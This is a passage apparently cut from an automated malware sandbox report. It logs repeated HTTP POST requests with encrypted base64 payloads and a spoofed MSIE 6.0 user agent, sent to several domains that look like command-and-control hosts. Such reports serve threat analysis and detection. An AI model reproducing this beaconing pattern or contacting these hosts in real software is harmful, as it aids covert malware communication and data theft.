6a 4f 2f 2b 7a 7a 31 47 37 30 3d Data Ascii: MZX28e3b89eWrhwe5IyW16aGLeHbUejCcRuQT7va/of+bLycwYaYn9Cn447kK04WFI0W+Ts8mqKIktP15rnwQB/PqQ/8OzNtJ8OPudxgZq4fXCm+6T8vW1SY5oHjL/gURHSOH7P8OwU6Hx42nxBtTCHcgWTFWk7R5XngHS4uih57cEJKFfA83X98PyTH/4NoLkNZ1f9Lxav/R2FheR5IdEEAuuwlX0q987LfGIOI4zOj4a5bOV6sEEHz86RwgVfJHCoIjR2Oe5JqVieiHgh8jFsSan02iQAfj+spYeERaBpNXWoRzIi/6J7A/3x4++e+tPwog/o+IuPJRKZtrx6ckR++thgPxq8g5yXOfmQh+y3B2oEcIlnKqbV5hjdl36roERaSKbcZzOJCFAuqCcIudwbWofISt4O66zRMmbqNlFoVO4k2FmlqoXMXpzJa95XrZ4LwYWQfUEo29dbH3QJH0B+l29H+E21V21szEcNJLs/Nef+YyhGRCGaAvqaorO/5SmwgOnRBaTELBwptC/3xyfRAjjO/+zz1G70=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 33 79 38 42 54 50 46 6f 42 39 69 6d 46 44 75 73 45 45 30 6f 61 45 6f 4f 6f 79 6b 76 48 65 2b 44 74 5a 37 47 79 64 76 33 67 46 4d 73 2b 42 5a 58 78 76 58 44 68 50 73 44 79 57 6a 54 6a 43 58 4f 35 4f 4e 65 4b 52 7a 75 30 47 6b 58 6d 44 4b 77 67 45 76 69 6e 6c 70 4b 2f 54 70 33 50 34 6f 4c 59 51 52 35 46 6d 73 5a 72 6a 46 49 4e 37 56 56 52 44 58 68 2b 42 35 44 36 44 4c 43 43 73 36 59 30 45 4c 38 37 38 7a 67 64 59 53 6c 45 6d 4c 6e 38 52 35 33 30 59 76 53 54 32 51 52 59 4b 59 45 35 34 38 2f 33 55 6d 33 73 6e 58 31 71 36 43 36 53 77 70 48 41 32 4a 5a 50 71 36 65 4e 79 73 30 61 6e 4e 2f 2f 78 59 48 4e 74 56 76 50 34 55 33 6c 31 4e 41 4a 63 4a 52 68 49 58 55 34 45 79 52 61 50 32 6c 61 58 37 64 4a 68 63 70 37 31 52 77 4e 78 6f 74 79 37 5a 35 75 54 5a 73 49 46 74 34 61 70 7a 43 6c 76 6b 4f 54 46 6b 70 75 51 79 43 49 39 47 4e 4f 69 2f 4f 38 62 70 34 76 6f 78 45 48 76 4c 72 34 4a 52 73 5a 2f 50 39 2b 75 32 4c 4a 37 30 45 4b 4f 53 79 70 35 79 31 31 36 51 59 42 35 36 78 77 42 64 48 4d 65 70 38 4a 63 2f 76 2b 34 73 75 4e 65 47 66 66 71 75 48 35 33 34 41 4d 64 34 31 75 6a 62 59 49 61 30 50 36 78 2f 47 5a 44 44 36 4c 41 77 6b 45 35 33 38 4b 7a 4c 30 6d 38 46 43 73 4b 4a 35 6e 73 63 53 34 45 43 58 52 4f 74 2f 4f 56 51 6a 45 30 52 36 6a 37 69 56 4f 38 7a 4e 2b 6e 75 51 71 6c 47 43 38 4f 43 6d 51 6d 75 66 36 39 6d 74 4b 52 69 4a 59 71 36 62 30 33 30 31 45 54 54 6e 4b 4a 74 5a 30 41 4d 4b 2b 6f 48 6d 33 50 77 66 52 2f 49 64 79 4c 37 53 2f 4a 4b 48 32 6f 2b 36 2b 35 71 63 44 6f 71 42 78 70 67 42 6a 6a 30 77 48 51 4e 38 6d 31 49 43 4b 54 68 67 4e 36 6a 54 71 68 7a 43 6a 44 30 6b 52 72 38 67 69 77 6b 35 6d 62 61 50 48 36 4c 74 4e 61 63 3d Data Ascii: 3y8BTPFoB9imFDusEE0oaEoOoykvHe+DtZ7Gydv3gFMs+BZXxvXDhPsDyWjTjCXO5ONeKRzu0GkXmDKwgEvinlpK/Tp3P4oLYQR5FmsZrjFIN7VVRDXh+B5D6DLCCs6Y0EL878zgdYSlEmLn8R530YvST2QRYKYE548/3Um3snX1q6C6SwpHA2JZPq6eNys0anN//xYHNtVvP4U3l1NAJcJRhIXU4EyRaP2laX7dJhcp71RwNxoty7Z5uTZsIFt4apzClvkOTFkpuQyCI9GNOi/O8bp4voxEHvLr4JRsZ/P9+u2LJ70EKOSyp5y116QYB56xwBdHMep8Jc/v+4suNeGffquH534AMd41ujbYIa0P6x/GZDD6LAwkE538KzL0m8FCsKJ5nscS4ECXROt/OVQjE0R6j7iVO8zN+nuQqlGC8OCmQmuf69mtKRiJYq6b0301ETTnKJtZ0AMK+oHm3PwfR/IdyL7S/JKH2o+6+5qcDoqBxpgBjj0wHQN8m1ICKThgN6jTqhzCjD0kRr8giwk5mbaPH6LtNac=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 7a 56 36 6f 50 6a 68 4b 44 39 67 45 4b 78 4f 6e 75 77 68 41 6a 43 74 4b 56 4b 79 41 4d 5a 47 64 37 45 41 53 35 4f 31 68 33 34 2f 54 32 49 58 6c 53 52 51 4e 39 63 4f 64 42 51 30 69 30 63 72 32 65 67 6c 56 4c 53 78 57 74 67 65 6b 32 37 66 58 46 42 6d 67 57 2b 30 67 50 75 6f 35 69 4d 4b 53 48 67 49 72 71 42 52 4f 6e 6e 42 35 43 44 6b 58 33 59 41 35 48 63 59 56 4e 74 6d 64 59 71 65 63 34 32 66 4e 6d 76 76 2f 35 5a 64 72 69 69 67 33 31 34 55 43 59 46 4e 47 46 58 65 64 54 30 43 71 65 66 79 4e 36 57 47 46 35 67 73 45 5a 38 76 46 51 53 62 36 65 54 6a 2f 4b 6e 36 72 45 55 6b 35 44 7a 77 47 32 72 64 74 6a 45 57 69 4a 49 6b 68 51 44 73 58 6d 6e 59 6a 6e 78 76 53 35 43 75 79 52 51 42 75 49 4c 6a 55 54 6b 49 4e 79 79 43 55 4b 48 46 34 62 78 63 57 64 69 4e 52 59 30 5a 4d 77 4e 6d 31 37 57 59 66 79 55 35 72 42 53 2f 7a 65 46 38 66 70 6e 58 70 2f 38 76 6e 43 53 4a 59 5a 38 59 4d 52 56 71 42 30 70 6a 57 36 69 61 41 72 72 66 52 54 51 59 66 46 7a 74 6e 41 65 63 62 2b 77 71 74 6d 70 62 2b 72 69 6c 75 67 61 64 43 47 56 44 53 4d 50 55 61 37 36 68 77 65 71 4a 37 78 57 38 6a 59 54 69 6b 42 78 30 45 54 75 44 52 61 42 30 36 45 66 61 33 51 49 37 39 54 49 4c 79 52 2f 75 4e 69 33 74 48 56 4b 30 4e 42 59 64 6f 5a 4e 41 68 61 50 4c 59 37 35 53 67 61 54 4a 65 67 39 73 2f 68 5a 46 5a 62 6e 36 6f 51 6f 4c 38 72 46 4d 30 56 72 51 4f 4c 48 49 75 61 37 6b 51 53 69 33 4c 6b 59 47 69 48 30 6d 51 37 78 50 6e 47 6b 50 4d 50 38 35 7a 65 45 7a 41 47 36 30 50 70 2f 32 55 4b 78 53 4e 73 52 36 7a 50 50 30 61 50 7a 62 32 48 5a 41 63 41 4b 7a 5a 51 67 7a 62 70 51 58 70 6a 4f 41 4e 2b 33 72 5a 32 4d 43 38 38 74 55 52 57 54 51 6e 4c 63 37 56 34 53 47 4b 78 6d 47 74 67 46 4c 78 43 31 37 5a 73 73 70 6e 7a 78 76 2b 2b 59 4d 3d Data Ascii: zV6oPjhKD9gEKxOnuwhAjCtKVKyAMZGd7EAS5O1h34/T2IXlSRQN9cOdBQ0i0cr2eglVLSxWtgek27fXFBmgW+0gPuo5iMKSHgIrqBROnnB5CDkX3YA5HcYVNtmdYqec42fNmvv/5Zdriig314UCYFNGFXedT0CqefyN6WGF5gsEZ8vFQSb6eTj/Kn6rEUk5DzwG2rdtjEWiJIkhQDsXmnYjnxvS5CuyRQBuILjUTkINyyCUKHF4bxcWdiNRY0ZMwNm17WYfyU5rBS/zeF8fpnXp/8vnCSJYZ8YMRVqB0pjW6iaArrfRTQYfFztnAecb+wqtmpb+rilugadCGVDSMPUa76hweqJ7xW8jYTikBx0ETuDRaB06Efa3QI79TILyR/uNi3tHVK0NBYdoZNAhaPLY75SgaTJeg9s/hZFZbn6oQoL8rFM0VrQOLHIua7kQSi3LkYGiH0mQ7xPnGkPMP85zeEzAG60Pp/2UKxSNsR6zPP0aPzb2HZAcAKzZQgzbpQXpjOAN+3rZ2MC88tURWTQnLc7V4SGKxmGtgFLxC17Zsspnzxv++YM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 35 49 6b 4f 54 46 39 70 42 39 67 74 5a 51 72 32 76 69 63 53 63 2b 6a 65 32 69 4d 31 61 56 4c 56 41 78 38 6e 33 4f 78 4f 35 32 51 63 78 73 74 70 4b 7a 64 47 4b 75 6f 4b 2b 4d 34 74 43 58 4c 76 58 65 79 4b 38 58 6a 35 69 79 49 54 43 62 67 48 35 39 57 71 6e 39 64 74 76 4e 36 59 76 73 72 53 50 78 6b 75 67 73 30 7a 49 31 57 62 65 36 30 6e 49 55 68 6b 33 6b 52 73 79 48 49 43 62 71 6c 6a 39 63 6d 66 43 73 77 77 47 69 52 61 55 35 71 4f 6d 46 69 74 31 73 77 62 4b 4d 68 63 6f 44 4e 64 45 63 6a 38 78 63 50 4d 6b 7a 56 44 6b 61 70 2b 32 34 56 6b 47 6c 43 51 63 61 30 4c 51 76 7a 41 34 65 2f 71 47 38 6e 30 2b 53 62 56 77 33 67 2f 41 4b 67 55 4c 68 49 4f 77 41 64 5a 7a 36 56 53 73 52 6a 5a 56 65 5a 70 65 6b 50 61 6c 70 41 41 30 67 31 46 46 2f 55 57 30 4f 53 4f 43 73 52 65 4b 4b 76 71 69 67 72 58 4a 42 45 6b 4b 74 7a 46 72 67 47 66 79 30 43 59 43 46 37 69 76 71 4f 4b 57 71 4e 33 32 57 56 52 48 50 77 6d 4a 4b 63 34 6d 63 42 49 34 44 4a 43 63 4f 47 46 4f 4e 56 46 6b 30 4d 48 56 6d 59 79 56 53 79 4c 32 30 67 4b 67 45 35 68 2f 70 63 37 69 31 66 5a 61 48 35 72 76 6f 77 50 6a 36 42 4a 74 6e 4f 65 4d 6a 44 74 30 42 2f 57 6d 53 4f 47 57 5a 68 63 35 35 66 78 70 6a 6b 55 36 41 53 66 42 75 36 71 4b 4e 77 2b 77 45 5a 6b 44 64 57 72 68 79 74 78 4e 30 37 31 51 53 38 70 4f 51 73 75 33 74 67 66 62 7a 30 36 51 5a 31 4d 4c 49 6c 54 65 51 48 75 6b 71 73 6c 7a 78 52 79 4b 4d 32 4b 51 64 6d 59 6c 41 63 63 43 73 59 64 68 48 49 47 42 39 34 6f 44 35 31 36 49 32 6c 37 79 4b 71 53 6e 47 78 44 4a 46 6c 39 37 76 68 4f 66 2b 57 71 6c 55 41 58 5a 57 77 4d 62 70 70 59 70 34 64 65 76 38 68 33 72 61 4b 75 44 30 57 69 69 39 5a 51 4d 47 32 4e 44 6e 57 58 68 57 59 52 Data Ascii: 5IkOTF9pB9gtZQr2vicSc+je2iM1aVLVAx8n3OxO52QcxstpKzdGKuoK+M4tCXLvXeyK8Xj5iyITCbgH59Wqn9dtvN6YvsrSPxkugs0zI1Wbe60nIUhk3kRsyHICbqlj9cmfCswwGiRaU5qOmFit1swbKMhcoDNdEcj8xcPMkzVDkap+24VkGlCQca0LQvzA4e/qG8n0+SbVw3g/AKgULhIOwAdZz6VSsRjZVeZpekPalpAA0g1FF/UW0OSOCsReKKvqigrXJBEkKtzFrgGfy0CYCF7ivqOKWqN32WVRHPwmJKc4mcBI4DJCcOGFONVFk0MHVmYyVSyL20gKgE5h/pc7i1fZaH5rvowPj6BJtnOeMjDt0B/WmSOGWZhc55fxpjkU6ASfBu6qKNw+wEZkDdWrhytxN071QS8pOQsu3tgfbz06QZ1MLIlTeQHukqslzxRyKM2KQdmYlAccCsYdhHIGB94oD516I2l7yKqSnGxDJFl97vhOf+WqlUAXZWwMbppYp4dev8h3raKuD0Wii9ZQMG2NDnWXhWYR
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 7a 56 36 6f 50 6a 68 4b 44 39 67 45 4b 78 4f 6e 75 77 68 41 6a 43 74 4b 56 4b 79 41 4d 5a 47 64 37 45 41 53 35 4f 31 68 33 34 2f 54 32 49 58 6c 53 52 51 4e 39 63 4f 64 42 51 30 69 30 63 72 32 65 67 6c 56 4c 53 78 57 74 67 65 6b 32 37 66 58 46 42 6d 67 57 2b 30 67 50 75 6f 35 69 4d 4b 53 48 67 49 72 71 42 52 4f 6e 6e 42 35 43 44 6b 58 33 59 41 35 48 63 59 56 4e 74 6d 64 59 71 65 63 34 32 66 4e 6d 76 76 2f 35 5a 64 72 69 69 67 33 31 34 55 43 59 46 4e 47 46 58 65 64 54 30 43 71 65 66 79 4e 36 57 47 46 35 67 73 45 5a 38 76 46 51 53 62 36 65 54 6a 2f 4b 6e 36 72 45 55 6b 35 44 7a 77 47 32 72 64 74 6a 45 57 69 4a 49 6b 68 51 44 73 58 6d 6e 59 6a 6e 78 76 53 35 43 75 79 52 51 42 75 49 4c 6a 55 54 6b 49 4e 79 79 43 55 4b 48 46 34 62 78 63 57 64 69 4e 52 59 30 5a 4d 77 4e 6d 31 37 57 59 66 79 55 35 72 42 53 2f 7a 65 46 38 66 70 6e 58 70 2f 38 76 6e 43 53 4a 59 5a 38 59 4d 52 56 71 42 30 70 6a 57 36 69 61 41 72 72 66 52 54 51 59 66 46 7a 74 6e 41 65 63 62 2b 77 71 74 6d 70 62 2b 72 69 6c 75 67 61 64 43 47 56 44 53 4d 50 55 61 37 36 68 77 65 71 4a 37 78 57 38 6a 59 54 69 6b 42 78 30 45 54 75 44 52 61 42 30 36 45 66 61 33 51 49 37 39 54 49 4c 79 52 2f 75 4e 69 33 74 48 56 4b 30 4e 42 59 64 6f 5a 4e 41 68 61 50 4c 59 37 35 53 67 61 54 4a 65 67 39 73 2f 68 5a 46 5a 62 6e 36 6f 51 6f 4c 38 72 46 4d 30 56 72 51 4f 4c 48 49 75 61 37 6b 51 53 69 33 4c 6b 59 47 69 48 30 6d 51 37 78 50 6e 47 6b 50 4d 50 38 35 7a 65 45 7a 41 47 36 30 50 70 2f 32 55 4b 78 53 4e 73 52 36 7a 50 50 30 61 50 7a 62 32 48 5a 41 63 41 4b 7a 5a 51 67 7a 62 70 51 58 70 6a 4f 41 4e 2b 33 72 5a 32 4d 43 38 38 74 55 52 57 54 51 6e 4c 63 37 56 34 53 47 4b 78 6d 47 74 67 46 4c 78 43 31 37 5a 73 73 70 6e 7a 78 76 2b 2b 59 4d 3d Data Ascii: zV6oPjhKD9gEKxOnuwhAjCtKVKyAMZGd7EAS5O1h34/T2IXlSRQN9cOdBQ0i0cr2eglVLSxWtgek27fXFBmgW+0gPuo5iMKSHgIrqBROnnB5CDkX3YA5HcYVNtmdYqec42fNmvv/5Zdriig314UCYFNGFXedT0CqefyN6WGF5gsEZ8vFQSb6eTj/Kn6rEUk5DzwG2rdtjEWiJIkhQDsXmnYjnxvS5CuyRQBuILjUTkINyyCUKHF4bxcWdiNRY0ZMwNm17WYfyU5rBS/zeF8fpnXp/8vnCSJYZ8YMRVqB0pjW6iaArrfRTQYfFztnAecb+wqtmpb+rilugadCGVDSMPUa76hweqJ7xW8jYTikBx0ETuDRaB06Efa3QI79TILyR/uNi3tHVK0NBYdoZNAhaPLY75SgaTJeg9s/hZFZbn6oQoL8rFM0VrQOLHIua7kQSi3LkYGiH0mQ7xPnGkPMP85zeEzAG60Pp/2UKxSNsR6zPP0aPzb2HZAcAKzZQgzbpQXpjOAN+3rZ2MC88tURWTQnLc7V4SGKxmGtgFLxC17Zsspnzxv++YM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 32 75 4c 47 6d 59 41 33 68 42 44 41 52 38 4c 42 55 38 54 43 4c 4c 50 4f 69 6c 5a 6f 4c 47 7a 73 74 4f 5a 78 44 2b 57 69 4c 30 49 4e 50 6b 63 70 59 6f 41 74 53 6d 48 2f 43 52 62 4b 76 4e 74 2b 2f 76 31 4d 78 49 4e 6f 43 71 59 52 49 6a 44 4a 2f 7a 2f 48 54 30 63 51 79 33 6c 4a 48 38 70 4d 79 4e 72 47 49 30 55 47 59 48 46 55 51 4e 49 74 6d 63 6e 2f 4b 49 35 38 69 6f 65 45 64 43 2f 61 6d 64 4b 33 51 71 6b 4b 52 4d 64 74 7a 68 69 78 2f 62 6b 31 6c 36 62 4a 41 71 75 62 55 49 67 53 45 5a 4d 44 70 61 70 2b 35 75 4f 70 70 36 33 4a 4d 6a 4e 58 41 34 4a 31 6d 6c 49 2f 70 42 45 66 35 79 73 41 6c 34 5a 31 61 6d 2f 30 52 69 42 4b 6e 38 50 4f 46 71 64 4d 71 44 57 42 46 37 57 65 57 6b 6f 5a 42 41 35 79 73 52 49 4f 4c 6d 4e 71 6b 7a 39 6e 57 55 55 56 58 71 71 50 61 63 37 46 75 44 30 42 67 66 75 39 59 49 62 55 4a 51 68 2b 4d 75 54 71 31 6b 78 39 45 53 63 53 31 45 4d 57 50 66 2b 59 30 78 5a 7a 58 41 72 49 74 51 70 59 2b 2f 51 53 48 67 4a 78 31 5a 35 45 36 57 4a 31 79 31 56 51 32 42 63 75 31 39 49 78 6b 61 36 55 78 75 5a 55 53 4b 46 50 7a 7a 6f 31 67 46 67 66 45 35 52 64 74 74 79 52 54 4f 2b 4c 4c 79 47 42 6b 70 55 66 6f 30 6b 4c 59 33 36 69 38 4f 56 36 75 30 52 41 57 62 71 36 31 71 34 44 4a 56 59 4c 69 46 7a 45 32 41 59 46 53 44 33 59 62 6a 2b 69 33 54 4d 48 66 39 56 52 71 55 52 51 69 41 42 66 49 4a 39 58 4f 68 68 47 68 43 32 50 75 57 41 38 6f 6d 53 37 5a 79 4b 6d 6c 68 2b 4d 4d 76 6f 45 5a 65 48 64 49 38 54 64 2b 7a 78 61 50 2b 55 63 70 7a 63 35 48 72 44 57 59 6f 36 74 47 54 53 70 41 79 49 63 75 42 30 66 58 6d 4d 78 49 44 6a 41 76 44 55 30 45 6a 6a 47 35 7a 76 75 76 59 69 30 5a 39 75 70 57 42 65 75 53 65 48 67 38 67 72 6f 67 2f 72 44 54 38 4e 64 68 2b 62 64 4d 41 3d 3d Data Ascii: 2uLGmYA3hBDAR8LBU8TCLLPOilZoLGzstOZxD+WiL0INPkcpYoAtSmH/CRbKvNt+/v1MxINoCqYRIjDJ/z/HT0cQy3lJH8pMyNrGI0UGYHFUQNItmcn/KI58ioeEdC/amdK3QqkKRMdtzhix/bk1l6bJAqubUIgSEZMDpap+5uOpp63JMjNXA4J1mlI/pBEf5ysAl4Z1am/0RiBKn8POFqdMqDWBF7WeWkoZBA5ysRIOLmNqkz9nWUUVXqqPac7FuD0Bgfu9YIbUJQh+MuTq1kx9EScS1EMWPf+Y0xZzXArItQpY+/QSHgJx1Z5E6WJ1y1VQ2Bcu19Ixka6UxuZUSKFPzzo1gFgfE5RdttyRTO+LLyGBkpUfo0kLY36i8OV6u0RAWbq61q4DJVYLiFzE2AYFSD3Ybj+i3TMHf9VRqURQiABfIJ9XOhhGhC2PuWA8omS7ZyKmlh+MMvoEZeHdI8Td+zxaP+Ucpzc5HrDWYo6tGTSpAyIcuB0fXmMxIDjAvDU0EjjG5zvuvYi0Z9upWBeuSeHg8grog/rDT8Ndh+bdMA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 49 50 6a 64 5a 35 4f 59 67 68 43 33 49 61 55 36 57 6b 51 32 41 6a 79 30 67 37 46 35 36 72 43 47 64 38 63 5a 4a 63 59 4e 52 30 34 55 64 49 67 31 68 55 77 62 53 52 54 6c 55 51 73 61 32 6b 2b 30 45 41 49 76 4d 70 39 5a 38 2f 6a 6f 4d 53 48 41 30 30 36 54 61 41 66 78 2b 77 35 6e 35 79 30 31 73 78 33 4d 44 2b 43 63 6d 79 4c 5a 64 49 58 70 50 46 68 59 47 73 32 57 32 70 56 50 48 75 47 70 2b 57 48 4e 4c 63 57 69 75 69 4c 48 34 49 6e 49 64 6c 62 62 6d 49 44 69 69 70 62 43 78 2b 30 63 74 4a 6a 57 47 32 78 34 4f 50 56 66 2b 79 53 4f 5a 30 36 57 75 5a 73 45 75 63 4d 4b 69 45 52 53 6e 59 2f 6b 64 66 51 73 72 67 62 4b 2b 34 4b 52 69 51 65 52 37 39 5a 62 34 78 7a 45 64 72 35 74 63 39 31 4a 74 4f 52 73 47 75 7a 31 4b 6e 4f 53 2b 36 6a 41 61 6e 48 4c 72 2b 6f 4b 33 79 67 69 38 47 4a 66 4f 47 6f 47 2f 50 66 53 63 77 35 6b 57 52 2b 68 79 33 55 2b 4b 2f 4b 68 6d 37 4b 43 4b 72 4d 45 56 53 52 6b 41 43 4c 49 75 32 4f 30 32 36 2b 67 49 57 31 71 57 63 36 56 30 73 4a 7a 54 67 76 54 6a 75 42 34 30 69 42 6e 75 43 56 67 56 66 44 67 6c 4f 38 6b 7a 79 55 44 51 6c 55 47 44 44 59 46 76 74 77 6c 55 56 56 6f 49 46 54 4d 4d 35 77 4d 50 67 69 62 39 54 51 57 63 36 61 79 68 39 4b 52 32 34 38 77 6d 79 66 4c 67 52 63 65 41 41 73 46 38 6c 4c 46 53 4b 6d 6d 6c 65 41 4a 79 33 6c 68 55 4b 59 37 75 6c 67 58 55 44 56 58 38 31 31 4d 52 75 35 52 58 46 56 43 56 31 64 76 49 55 62 55 73 2f 4f 50 58 37 76 4e 75 62 62 65 4d 71 42 77 50 70 32 70 6f 4c 35 6f 5a 31 38 77 46 2f 50 39 69 6b 2f 4d 61 78 59 77 4b 50 6f 78 58 41 55 4a 67 52 37 6d 62 78 30 56 36 31 4c 75 66 46 51 2b 78 5a 62 32 74 2b 6c 43 65 51 6c 79 4a 4d 63 6c 70 6d 66 6b 70 71 44 4a 4e 55 49 58 78 32 62 66 72 4b 68 50 44 58 52 52 47 43 78 5a 41 4a 6c 57 39 4c 78 36 33 52 68 72 67 73 51 3d Data Ascii: IPjdZ5OYghC3IaU6WkQ2Ajy0g7F56rCGd8cZJcYNR04UdIg1hUwbSRTlUQsa2k+0EAIvMp9Z8/joMSHA006TaAfx+w5n5y01sx3MD+CcmyLZdIXpPFhYGs2W2pVPHuGp+WHNLcWiuiLH4InIdlbbmIDiipbCx+0ctJjWG2x4OPVf+ySOZ06WuZsEucMKiERSnY/kdfQsrgbK+4KRiQeR79Zb4xzEdr5tc91JtORsGuz1KnOS+6jAanHLr+oK3ygi8GJfOGoG/PfScw5kWR+hy3U+K/Khm7KCKrMEVSRkACLIu2O026+gIW1qWc6V0sJzTgvTjuB40iBnuCVgVfDglO8kzyUDQlUGDDYFvtwlUVVoIFTMM5wMPgib9TQWc6ayh9KR248wmyfLgRceAAsF8lLFSKmmleAJy3lhUKY7ulgXUDVX811MRu5RXFVCV1dvIUbUs/OPX7vNubbeMqBwPp2poL5oZ18wF/P9ik/MaxYwKPoxXAUJgR7mbx0V61LufFQ+xZb2t+lCeQlyJMclpmfkpqDJNUIXx2bfrKhPDXRRGCxZAJlW9Lx63RhrgsQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 32 75 4c 47 6d 59 41 33 68 42 44 41 52 38 4c 42 55 38 54 43 4c 4c 50 4f 69 6c 5a 6f 4c 47 7a 73 74 4f 5a 78 44 2b 57 69 4c 30 49 4e 50 6b 63 70 59 6f 41 74 53 6d 48 2f 43 52 62 4b 76 4e 74 2b 2f 76 31 4d 78 49 4e 6f 43 71 59 52 49 6a 44 4a 2f 7a 2f 48 54 30 63 51 79 33 6c 4a 48 38 70 4d 79 4e 72 47 49 30 55 47 59 48 46 55 51 4e 49 74 6d 63 6e 2f 4b 49 35 38 69 6f 65 45 64 43 2f 61 6d 64 4b 33 51 71 6b 4b 52 4d 64 74 7a 68 69 78 2f 62 6b 31 6c 36 62 4a 41 71 75 62 55 49 67 53 45 5a 4d 44 70 61 70 2b 35 75 4f 70 70 36 33 4a 4d 6a 4e 58 41 34 4a 31 6d 6c 49 2f 70 42 45 66 35 79 73 41 6c 34 5a 31 61 6d 2f 30 52 69 42 4b 6e 38 50 4f 46 71 64 4d 71 44 57 42 46 37 57 65 57 6b 6f 5a 42 41 35 79 73 52 49 4f 4c 6d 4e 71 6b 7a 39 6e 57 55 55 56 58 71 71 50 61 63 37 46 75 44 30 42 67 66 75 39 59 49 62 55 4a 51 68 2b 4d 75 54 71 31 6b 78 39 45 53 63 53 31 45 4d 57 50 66 2b 59 30 78 5a 7a 58 41 72 49 74 51 70 59 2b 2f 51 53 48 67 4a 78 31 5a 35 45 36 57 4a 31 79 31 56 51 32 42 63 75 31 39 49 78 6b 61 36 55 78 75 5a 55 53 4b 46 50 7a 7a 6f 31 67 46 67 66 45 35 52 64 74 74 79 52 54 4f 2b 4c 4c 79 47 42 6b 70 55 66 6f 30 6b 4c 59 33 36 69 38 4f 56 36 75 30 52 41 57 62 71 36 31 71 34 44 4a 56 59 4c 69 46 7a 45 32 41 59 46 53 44 33 59 62 6a 2b 69 33 54 4d 48 66 39 56 52 71 55 52 51 69 41 42 66 49 4a 39 58 4f 68 68 47 68 43 32 50 75 57 41 38 6f 6d 53 37 5a 79 4b 6d 6c 68 2b 4d 4d 76 6f 45 5a 65 48 64 49 38 54 64 2b 7a 78 61 50 2b 55 63 70 7a 63 35 48 72 44 57 59 6f 36 74 47 54 53 70 41 79 49 63 75 42 30 66 58 6d 4d 78 49 44 6a 41 76 44 55 30 45 6a 6a 47 35 7a 76 75 76 59 69 30 5a 39 75 70 57 42 65 75 53 65 48 67 38 67 72 6f 67 2f 72 44 54 38 4e 64 68 2b 62 64 4d 41 3d 3d Data Ascii: 2uLGmYA3hBDAR8LBU8TCLLPOilZoLGzstOZxD+WiL0INPkcpYoAtSmH/CRbKvNt+/v1MxINoCqYRIjDJ/z/HT0cQy3lJH8pMyNrGI0UGYHFUQNItmcn/KI58ioeEdC/amdK3QqkKRMdtzhix/bk1l6bJAqubUIgSEZMDpap+5uOpp63JMjNXA4J1mlI/pBEf5ysAl4Z1am/0RiBKn8POFqdMqDWBF7WeWkoZBA5ysRIOLmNqkz9nWUUVXqqPac7FuD0Bgfu9YIbUJQh+MuTq1kx9EScS1EMWPf+Y0xZzXArItQpY+/QSHgJx1Z5E6WJ1y1VQ2Bcu19Ixka6UxuZUSKFPzzo1gFgfE5RdttyRTO+LLyGBkpUfo0kLY36i8OV6u0RAWbq61q4DJVYLiFzE2AYFSD3Ybj+i3TMHf9VRqURQiABfIJ9XOhhGhC2PuWA8omS7ZyKmlh+MMvoEZeHdI8Td+zxaP+Ucpzc5HrDWYo6tGTSpAyIcuB0fXmMxIDjAvDU0EjjG5zvuvYi0Z9upWBeuSeHg8grog/rDT8Ndh+bdMA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 62 67 69 68 50 76 70 4a 44 39 69 41 5a 78 37 70 6e 56 45 5a 68 6a 33 56 72 51 78 71 6f 65 41 70 7a 6d 75 4d 6d 43 33 50 50 36 61 62 66 70 64 6d 48 4e 73 44 53 49 54 55 62 55 61 59 36 7a 67 57 4e 76 6d 4f 56 65 36 50 75 78 79 77 69 5a 55 44 5a 58 62 36 63 39 59 72 77 42 47 49 56 67 38 32 79 4d 34 59 6d 44 42 33 6d 63 59 31 2f 57 61 59 64 30 63 58 63 61 67 55 49 70 77 47 44 6e 68 4e 56 47 54 79 52 46 36 6c 4c 65 32 62 55 70 4b 42 57 64 49 47 57 5a 64 45 72 64 2b 79 49 45 72 38 45 55 4f 41 61 58 36 5a 64 7a 71 4f 55 51 4d 57 72 43 43 49 62 59 43 72 32 6c 6b 68 7a 76 36 52 70 44 70 71 72 54 53 2f 2f 33 4c 4d 4f 2b 61 57 53 58 64 31 6c 42 66 78 33 31 63 39 44 72 61 2f 73 44 5a 53 44 48 39 79 68 39 6d 68 50 6e 69 77 37 51 55 58 68 61 59 6a 43 49 36 7a 41 47 57 4b 62 47 73 35 7a 42 74 52 72 34 65 30 37 44 73 34 2f 43 5a 79 72 2f 4c 44 48 53 53 36 43 43 75 61 73 70 42 76 75 4b 46 7a 58 2b 49 50 54 4f 63 68 49 6e 63 58 